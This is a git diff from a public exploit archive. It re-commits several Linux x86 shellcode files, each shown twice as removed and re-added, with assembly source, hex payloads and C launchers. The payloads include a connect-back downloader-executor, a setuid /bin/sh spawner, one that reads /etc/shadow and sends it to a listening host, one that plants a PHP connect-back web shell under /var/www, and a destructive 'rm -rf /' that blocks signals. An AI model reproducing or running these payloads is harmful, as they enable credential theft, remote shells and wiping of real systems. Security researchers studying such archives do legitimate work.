chunk +int 0x80 +;sys_write(fd,*buf,count) +mov ebx,esi +mov edx,eax +xor eax,eax +mov al,4 +int 0x80 +cmp dx,0x03e8 +je L1 ;loop + + +CONTINUE: +;sys_close(fd) +mov ebx,esi +xor eax,eax +mov al,6 +int 0x80 + +;execve[./cb,0] +xor ecx,ecx +mul ecx +push ecx +push word 0x6263 ;file name="cb" +mov ebx,esp +push ecx +push ebx +mov ecx,esp +mov al,0x0b +int 0x80 + + +EXIT: +xor eax,eax +xor ebx,ebx +inc eax +int 0x80 +*/ + +#include +#include 
+#include + + +unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80" +"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80" +"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80" + +"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80" +"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80" +"\x31\xc0\x31\xdb\x40\xcd\x80"; + +void k(){ + int *ret; + ret=(int *)&ret+2; + (*ret)=(int)shellcode; +} + +int main (){ + k(); + return 0; +} + // milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13338.c b/platforms/lin_x86/shellcode/13338.c index 0097e676c..de8331fcf 100755 --- a/platforms/lin_x86/shellcode/13338.c +++ b/platforms/lin_x86/shellcode/13338.c 
@@ -1,44 +1,44 @@ -/* - -setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode - useful for wargames and the like. - -global _start - -section .text -_start: - ; geteuid - push byte 49 - pop eax - int 0x80 - - ; setreuid - mov ebx, eax - mov ecx, eax - push byte 70 - pop eax - int 0x80 - - ; execve - xor eax,eax - push eax - push 0x68732f2f - push 0x6e69622f - push esp - pop ebx - push eax - push ebx - mov ecx, esp - xor edx, edx - mov byte al,11 - int 0x80 -*/ - -main() { - char shellcode[] = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50" - "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31" - "\xd2\xb0\x0b\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* + +setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode - useful for wargames and the like. + +global _start + +section .text +_start: + ; geteuid + push byte 49 + pop eax + int 0x80 + + ; setreuid + mov ebx, eax + mov ecx, eax + push byte 70 + pop eax + int 0x80 + + ; execve + xor eax,eax + push eax + push 0x68732f2f + push 0x6e69622f + push esp + pop ebx + push eax + push ebx + mov ecx, esp + xor edx, edx + mov byte al,11 + int 0x80 +*/ + +main() { + char shellcode[] = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50" + "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31" + "\xd2\xb0\x0b\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13339.asm b/platforms/lin_x86/shellcode/13339.asm index d2b48bed6..4d928ca48 100755 --- a/platforms/lin_x86/shellcode/13339.asm +++ b/platforms/lin_x86/shellcode/13339.asm 
@@ -1,193 +1,193 @@ -; (C)oDed by 0in -; Dark-Coders Group Productions -; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode] -; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<< -; Contact: 0in[dot]email[at]gmail[dot]com -; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned -; Compile: -; nasm -f elf shellcode.asm -; ld -o shellcode shellcode.o -; How it works!? -; (1st console) [root@13world]# ./shellcode -; (2nd console) 0in[~]%> nc -v -l -p 8192 -; (2nd console) -;Connection from 127.0.0.1:48820 -;root:[password here]:13896:::::: -;bin:x:0:::::: -;daemon:x:0:::::: -;mail:x:0:::::: -;ftp:x:0:::::: -;nobody:x:0:::::: -;dbus:!:13716:0:99999:7::: -;zer0in:[password here]:13716:0:99999:7::: -;avahi:!:13716:0:99999:7::: -;hal:!:13716:0:99999:7::: -;clamav:!:13735:0:99999:7::: -;fetchmail:!:13737:0:99999:7::: -;mysql:!:12072:0:99999:7::: -;postfix:!:13798:0:99999:7::: -;mpd:!:13828:0:99999:7::: -;nginx:!:13959:0:99999:7::: -;tomcat:!:14063:0:99999:7::: -;http:!:14075:0:99999:7::: -;snort:!:14075:0:99999:7::: - -;The code (Assembler version): - -Section .text - global _start - -_start: - ;open(file,O_RDONLY): - xor ebx,ebx - push byte 0x77 ;/etc/shadow - push word 0x6f64 - push 0x6168732f - push 0x6374652f; ---------- - mov ebx,esp ; first arg - filename - xor ax,ax - inc ax - inc ax - inc ax - inc ax - inc ax ; ax = 5 (O_RDONLY) - int 0x80 - mov ebx,eax - ;read(file,buff,1222): - xor ax,ax - inc ax - inc ax - inc ax ; syscall id = 3 - mov dx,1222 ; size to read - push esp - mov ecx,[esp] ; memory - int 0x80 - mov esi,eax ; file to ESI - ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) - xor ebx,ebx - push ebx ;0 ; 3rd arg - inc ebx - push ebx ;1 ; 2nd arg - inc ebx - push ebx ;2 ; 1st arg - ;socketcall() - mov ax,1666 ;-------------- - sub ax,1564 ;-------------- - xor bx,bx ; socket() call id - inc bx ;- - - - - - - - - - mov ecx,esp ; socket() - int 0x80 ; do it! 
- pop ebx; clear mem - ;connect(eax,struct server,16) - ;16 - sizeof struct sockaddr - mov edx, eax - xor ebx,ebx - xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP) - push ebx - mov bx,1666 ; definition of struct sockaddr - sub bx,1634 ;we cant stay 0x00 here (8192 PORT) - push bx - mov al, 2 ; - push ax - mov ecx, esp - mov al, 16 - push eax - push ecx - push edx - mov al, 102 - mov bx,1666 - sub bx,1663 ;--------------------------------- - mov ecx, esp - int 0x80 ; call connect - mov ebx,eax ; socket to ebx - ; Ok! so... - ; Lets write file to server and go down! - ;write(socket,file,1222) - pop ebx - mov ax,1666 - sub ax,1662 - push esi - mov dx,16666 - sub dx,15444 - int 0x80 - ;exit(1) : - xor eax,eax ;---------- - inc eax - mov ebx,eax ;---------- - int 0x80 ; do it! -;C: -; #include -; char shellcode[]="\x31\xdb" -; "\x6a\x77" -; "\x66\x68\x64\x6f" -; "\x68\x2f\x73\x68\x61" -; "\x68\x2f\x65\x74\x63" -; "\x89\xe3" -; "\x66\x31\xc0" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\xcd\x80" -; "\x89\xc3" -; "\x66\x31\xc0" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\xba\xc6\x04" -; "\x54" -; "\x8b\x0c\x24" -; "\xcd\x80" -; "\x89\xc6" -; "\x31\xdb" -; "\x53" -; "\x43" -; "\x53" -; "\x43" -; "\x53" -; "\x66\xb8\x82\x06" -; "\x66\x2d\x1c\x06" -; "\x66\x31\xdb" -; "\x66\x43" -; "\x89\xe1" -; "\xcd\x80" -; "\x5b" -; "\x89\xc2" -; "\x31\xdb" -; "\x53" -; "\x66\xbb\x82\x06" -; "\x66\x81\xeb\x62\x06" -; "\x66\x53" -; "\xb0\x02" -; "\x66\x50" -; "\x89\xe1" -; "\xb0\x10" -; "\x50" -; "\x51" -; "\x52" -; "\xb0\x66" -; "\x66\xbb\x82\x06" -; "\x66\x81\xeb\x7f\x06" -; "\x89\xe1" -; "\xcd\x80" -; "\x89\xc3" -; "\x5b" -; "\x66\xb8\x82\x06" -; "\x66\x2d\x7e\x06" -; "\x56" -; "\x66\xba\x1a\x41" -; "\x66\x81\xea\x54\x3c" -; "\xcd\x80" -; "\x31\xc0" -; "\x40" -; "\x89\xc3" -; "\xcd\x80"; -; int main(int argc, char **argv) -; { -; int *ret; -; ret = (int *)&ret + 2; -; (*ret) = (int) shellcode; -; } - +; (C)oDed by 0in +; Dark-Coders Group 
Productions +; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode] +; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<< +; Contact: 0in[dot]email[at]gmail[dot]com +; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned +; Compile: +; nasm -f elf shellcode.asm +; ld -o shellcode shellcode.o +; How it works!? +; (1st console) [root@13world]# ./shellcode +; (2nd console) 0in[~]%> nc -v -l -p 8192 +; (2nd console) +;Connection from 127.0.0.1:48820 +;root:[password here]:13896:::::: +;bin:x:0:::::: +;daemon:x:0:::::: +;mail:x:0:::::: +;ftp:x:0:::::: +;nobody:x:0:::::: +;dbus:!:13716:0:99999:7::: +;zer0in:[password here]:13716:0:99999:7::: +;avahi:!:13716:0:99999:7::: +;hal:!:13716:0:99999:7::: +;clamav:!:13735:0:99999:7::: +;fetchmail:!:13737:0:99999:7::: +;mysql:!:12072:0:99999:7::: +;postfix:!:13798:0:99999:7::: +;mpd:!:13828:0:99999:7::: +;nginx:!:13959:0:99999:7::: +;tomcat:!:14063:0:99999:7::: +;http:!:14075:0:99999:7::: +;snort:!:14075:0:99999:7::: + +;The code (Assembler version): + +Section .text + global _start + +_start: + ;open(file,O_RDONLY): + xor ebx,ebx + push byte 0x77 ;/etc/shadow + push word 0x6f64 + push 0x6168732f + push 0x6374652f; ---------- + mov ebx,esp ; first arg - filename + xor ax,ax + inc ax + inc ax + inc ax + inc ax + inc ax ; ax = 5 (O_RDONLY) + int 0x80 + mov ebx,eax + ;read(file,buff,1222): + xor ax,ax + inc ax + inc ax + inc ax ; syscall id = 3 + mov dx,1222 ; size to read + push esp + mov ecx,[esp] ; memory + int 0x80 + mov esi,eax ; file to ESI + ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) + xor ebx,ebx + push ebx ;0 ; 3rd arg + inc ebx + push ebx ;1 ; 2nd arg + inc ebx + push ebx ;2 ; 1st arg + ;socketcall() + mov ax,1666 ;-------------- + sub ax,1564 ;-------------- + xor bx,bx ; socket() call id + inc bx ;- - - - - - - - - + mov ecx,esp ; socket() + int 0x80 ; do it! 
+ pop ebx; clear mem + ;connect(eax,struct server,16) + ;16 - sizeof struct sockaddr + mov edx, eax + xor ebx,ebx + xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP) + push ebx + mov bx,1666 ; definition of struct sockaddr + sub bx,1634 ;we cant stay 0x00 here (8192 PORT) + push bx + mov al, 2 ; + push ax + mov ecx, esp + mov al, 16 + push eax + push ecx + push edx + mov al, 102 + mov bx,1666 + sub bx,1663 ;--------------------------------- + mov ecx, esp + int 0x80 ; call connect + mov ebx,eax ; socket to ebx + ; Ok! so... + ; Lets write file to server and go down! + ;write(socket,file,1222) + pop ebx + mov ax,1666 + sub ax,1662 + push esi + mov dx,16666 + sub dx,15444 + int 0x80 + ;exit(1) : + xor eax,eax ;---------- + inc eax + mov ebx,eax ;---------- + int 0x80 ; do it! +;C: +; #include +; char shellcode[]="\x31\xdb" +; "\x6a\x77" +; "\x66\x68\x64\x6f" +; "\x68\x2f\x73\x68\x61" +; "\x68\x2f\x65\x74\x63" +; "\x89\xe3" +; "\x66\x31\xc0" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\xcd\x80" +; "\x89\xc3" +; "\x66\x31\xc0" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\xba\xc6\x04" +; "\x54" +; "\x8b\x0c\x24" +; "\xcd\x80" +; "\x89\xc6" +; "\x31\xdb" +; "\x53" +; "\x43" +; "\x53" +; "\x43" +; "\x53" +; "\x66\xb8\x82\x06" +; "\x66\x2d\x1c\x06" +; "\x66\x31\xdb" +; "\x66\x43" +; "\x89\xe1" +; "\xcd\x80" +; "\x5b" +; "\x89\xc2" +; "\x31\xdb" +; "\x53" +; "\x66\xbb\x82\x06" +; "\x66\x81\xeb\x62\x06" +; "\x66\x53" +; "\xb0\x02" +; "\x66\x50" +; "\x89\xe1" +; "\xb0\x10" +; "\x50" +; "\x51" +; "\x52" +; "\xb0\x66" +; "\x66\xbb\x82\x06" +; "\x66\x81\xeb\x7f\x06" +; "\x89\xe1" +; "\xcd\x80" +; "\x89\xc3" +; "\x5b" +; "\x66\xb8\x82\x06" +; "\x66\x2d\x7e\x06" +; "\x56" +; "\x66\xba\x1a\x41" +; "\x66\x81\xea\x54\x3c" +; "\xcd\x80" +; "\x31\xc0" +; "\x40" +; "\x89\xc3" +; "\xcd\x80"; +; int main(int argc, char **argv) +; { +; int *ret; +; ret = (int *)&ret + 2; +; (*ret) = (int) shellcode; +; } + ; milw0rm.com [2008-08-18] \ No newline at 
end of file diff --git a/platforms/lin_x86/shellcode/13340.c b/platforms/lin_x86/shellcode/13340.c index 265a9b014..f8e7ec788 100755 --- a/platforms/lin_x86/shellcode/13340.c +++ b/platforms/lin_x86/shellcode/13340.c 
@@ -1,126 +1,126 @@ -#include - - /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode - * - * Function: - * Opens /var/www/cb.php and writes a php connectback shell to the filesystem. - * - * Shellcode Size: 508 bytes (No Encodings) - * - * PHP Shell Usage: - * // victim - * http://vulnhost.com/cb.php?host=192.168.1.1?port=777 - * - * // attacker - * nc -l -p 777 - * - * greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else. - * - * - * ~roonr - */ - - - // shellcode - char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68" - "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1" - "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68" - "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c" - "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63" - "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74" - "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e" - "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68" - "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c" - "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f" - "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65" - "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a" - "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68" - "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b" - "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65" - "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73" - "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74" - "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68" - "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49" - "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f" - "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73" - 
"\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54" - "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68" - "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79" - "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73" - "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65" - "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f" - "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68" - "\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74" - "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21" - "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6" - "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80"; - - -int main(){ - - - // run shellcode - asm("JMP %0;" : "=m" (sc)); - - /* - asm volatile( - "cb_shellcode:\n" - "push $0xff706870;" - "push $0x2e62632f;" - "push $0x7777772f;" - "push $0x7261762f;" - "xor %eax, %eax;" - "mov %esp, %esi;" - "movb %al, 0xf(%esi);" - - // sys_open - "mov %esp, %ebx; " - "xor %ecx, %ecx;" - "movb $0x42, %cl;" - "xor %edx, %edx;" - "movb $0xff, %dl;" - "xor %eax, %eax;" - "movb $0x05, %al;" - "int $0x80;" - - // sys_write - "xor %ebx, %ebx;" - "mov %al, %bl;" - - // php connectback shellcode - "push $0xffff3e3f; push $0x7d207d3b; push $0x29297224; push $0x286e656c;" - "push $0x72747320; push $0x2c722420; push $0x2c6b636f; push $0x73242865;" - "push $0x74697277; push $0x5f74656b; push $0x636f733b; push $0x22202431;" - "push $0x2e317573; push $0x62636e5c; push $0x22203d2e; push $0x72243b60;" - "push $0x69246020; push $0x3d207224; push $0x7b292930; push $0x3031202c;" - "push $0x6b636f73; push $0x24286461; push $0x65725f74; push $0x656b636f;" - "push $0x733d6924; push $0x28656c69; push $0x68773b29; push $0x30312c22;" - "push $0x3a646574; push $0x63656e6e; push $0x6f432220; push $0x2c6b636f;" - "push $0x73242865; push $0x74697277; push $0x5f74656b; push $0x636f733b;" - "push $0x2974726f; push $0x7024202c; push 
$0x73736572; push $0x64646124;" - "push $0x202c6b63; push $0x6f732428; push $0x7463656e; push $0x6e6f635f;" - "push $0x74656b63; push $0x6f733b29; push $0x5043545f; push $0x4c4f532c;" - "push $0x4d414552; push $0x54535f4b; push $0x434f532c; push $0x54454e49;" - "push $0x5f464128; push $0x65746165; push $0x72635f74; push $0x656b636f;" - "push $0x733d6b63; push $0x6f73243b; push $0x5d277472; push $0x6f70275b;" - "push $0x5445475f; push $0x243d7472; push $0x6f70243b; push $0x295d2774;" - "push $0x736f6827; push $0x5b544547; push $0x5f242865; push $0x6d616e79;" - "push $0x6274736f; push $0x68746567; push $0x3d737365; push $0x72646461;" - "push $0x247b6573; push $0x6c657d3b; push $0x29222e34; push $0x30342072;" - "push $0x6f727245; push $0x2228746e; push $0x6972707b; push $0x295d2774;" - "push $0x726f7027; push $0x5b544547; push $0x5f242126; push $0x265d2774;" - "push $0x736f6827; push $0x5b544547; push $0x5f242128; push $0x66692050;" - "push $0x48503f3c;" - - "xor %eax, %eax;" - "mov %esp, %esi;" - "movb $0x04, %al;" - "mov %esp, %ecx;" - "mov $0x162, %dx;" - "int $0x80;"); - - */ - -} - +#include + + /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode + * + * Function: + * Opens /var/www/cb.php and writes a php connectback shell to the filesystem. + * + * Shellcode Size: 508 bytes (No Encodings) + * + * PHP Shell Usage: + * // victim + * http://vulnhost.com/cb.php?host=192.168.1.1?port=777 + * + * // attacker + * nc -l -p 777 + * + * greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else. 
+ * + * + * ~roonr + */ + + + // shellcode + char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68" + "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1" + "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68" + "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c" + "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63" + "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74" + "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e" + "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68" + "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c" + "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f" + "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65" + "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a" + "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68" + "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b" + "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65" + "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73" + "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74" + "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68" + "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49" + "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f" + "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73" + "\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54" + "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68" + "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79" + "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73" + "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65" + "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f" + "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68" + 
"\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74" + "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21" + "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6" + "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80"; + + +int main(){ + + + // run shellcode + asm("JMP %0;" : "=m" (sc)); + + /* + asm volatile( + "cb_shellcode:\n" + "push $0xff706870;" + "push $0x2e62632f;" + "push $0x7777772f;" + "push $0x7261762f;" + "xor %eax, %eax;" + "mov %esp, %esi;" + "movb %al, 0xf(%esi);" + + // sys_open + "mov %esp, %ebx; " + "xor %ecx, %ecx;" + "movb $0x42, %cl;" + "xor %edx, %edx;" + "movb $0xff, %dl;" + "xor %eax, %eax;" + "movb $0x05, %al;" + "int $0x80;" + + // sys_write + "xor %ebx, %ebx;" + "mov %al, %bl;" + + // php connectback shellcode + "push $0xffff3e3f; push $0x7d207d3b; push $0x29297224; push $0x286e656c;" + "push $0x72747320; push $0x2c722420; push $0x2c6b636f; push $0x73242865;" + "push $0x74697277; push $0x5f74656b; push $0x636f733b; push $0x22202431;" + "push $0x2e317573; push $0x62636e5c; push $0x22203d2e; push $0x72243b60;" + "push $0x69246020; push $0x3d207224; push $0x7b292930; push $0x3031202c;" + "push $0x6b636f73; push $0x24286461; push $0x65725f74; push $0x656b636f;" + "push $0x733d6924; push $0x28656c69; push $0x68773b29; push $0x30312c22;" + "push $0x3a646574; push $0x63656e6e; push $0x6f432220; push $0x2c6b636f;" + "push $0x73242865; push $0x74697277; push $0x5f74656b; push $0x636f733b;" + "push $0x2974726f; push $0x7024202c; push $0x73736572; push $0x64646124;" + "push $0x202c6b63; push $0x6f732428; push $0x7463656e; push $0x6e6f635f;" + "push $0x74656b63; push $0x6f733b29; push $0x5043545f; push $0x4c4f532c;" + "push $0x4d414552; push $0x54535f4b; push $0x434f532c; push $0x54454e49;" + "push $0x5f464128; push $0x65746165; push $0x72635f74; push $0x656b636f;" + "push $0x733d6b63; push $0x6f73243b; push $0x5d277472; push $0x6f70275b;" + "push $0x5445475f; push $0x243d7472; push $0x6f70243b; push $0x295d2774;" + 
"push $0x736f6827; push $0x5b544547; push $0x5f242865; push $0x6d616e79;" + "push $0x6274736f; push $0x68746567; push $0x3d737365; push $0x72646461;" + "push $0x247b6573; push $0x6c657d3b; push $0x29222e34; push $0x30342072;" + "push $0x6f727245; push $0x2228746e; push $0x6972707b; push $0x295d2774;" + "push $0x726f7027; push $0x5b544547; push $0x5f242126; push $0x265d2774;" + "push $0x736f6827; push $0x5b544547; push $0x5f242128; push $0x66692050;" + "push $0x48503f3c;" + + "xor %eax, %eax;" + "mov %esp, %esi;" + "movb $0x04, %al;" + "mov %esp, %ecx;" + "mov $0x162, %dx;" + "int $0x80;"); + + */ + +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13341.c b/platforms/lin_x86/shellcode/13341.c index f7d468d8d..a6af37c3b 100755 --- a/platforms/lin_x86/shellcode/13341.c +++ b/platforms/lin_x86/shellcode/13341.c 
@@ -1,74 +1,74 @@ -/* -x86 linux rm -rf / which attempts to block the process from being stopped -132 bytes -written by onionring -*/ - -main() -{ - char shellcode[] = -"\x31\xC0" // xor eax, eax -"\x89\xC3" // mov ebx, eax -"\x89\xC1" // mov ecx, eax -"\x41" // inc ecx -"\xB0\x30" // mov al, 0x30 ; sys_signal -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\xFE\xC3" // inc bl -"\x80\xFB\x1F" // cmp bl, 0x1f -"\x72\xF3" // jb 0xf3 -"\x04\x40" // add al, 0x40 ; sys_getppid -"\xCD\x80" // int 0x80 -"\x89\xC2" // mov edx, eax -"\x31\xC0" // xor eax, eax -"\xB0\x02" // mov al, 0x2 ; sys_fork -"\xCD\x80" // int 0x80 -"\x39\xC0" // cmp eax, eax -"\x74\x08" // jnz 0x8 -"\x31\xC0" // xor eax, eax -"\x89\xC3" // mov ebx, eax -"\xB0\x01" // mov al, 0x1 ; sys_exit -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\xB0\x42" // mov al, 0x42 ; sys_setsid -"\xCD\x80" // int 0x80 -"\x43" // inc ebx -"\x39\xDA" // cmp edx, ebx -"\x74\x08" // jz 0x8 -"\x89\xD3" // mov ebx, edx -"\x31\xC0" // xor eax, eax -"\x04\x25" // add al, 0x25 ; sys_kill -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\x50" // push eax -"\x68\x6F\x67\x69\x6E" // push "ogin" -"\x68\x69\x6E\x2F\x6C" // push "in/l" -"\x68\x2F\x2F\x2F\x62" // push "///b" -"\x89\xE3" // mov ebx, esp -"\x31\xC0" // xor eax, eax -"\x04\x0A" // add al, 0xa ; sys_unlink -"\xCD\x80" // int 0x80 -"\x31\xC0" // xor eax, eax -"\x50" // push eax -"\x68\x2F\x2F\x2F\x2F" // push "////" -"\x89\xE2" // mov edx, esp -"\x50" // push eax -"\x68\x2D\x72\x66\x66" // push "-rff" -"\x89\xE1" // mov ecx, esp -"\x50" // push eax -"\x68\x6E\x2F\x72\x6D" // push "n/rm" -"\x68\x2F\x2F\x62\x69" // push "//bi" -"\x89\xE3" // mov ebx, esp -"\x50" // push eax -"\x52" // push edx -"\x51" // push ecx -"\x53" // push ebx -"\x89\xE1" // mov ecx, esp -"\x31\xD2" // xor edx, edx -"\x04\x0B" // add al, 0xb ; sys_execve -"\xCD\x80"; // int 0x80 - - (*(void (*)()) shellcode)(); -} - +/* +x86 linux rm -rf / which attempts to block the process from being 
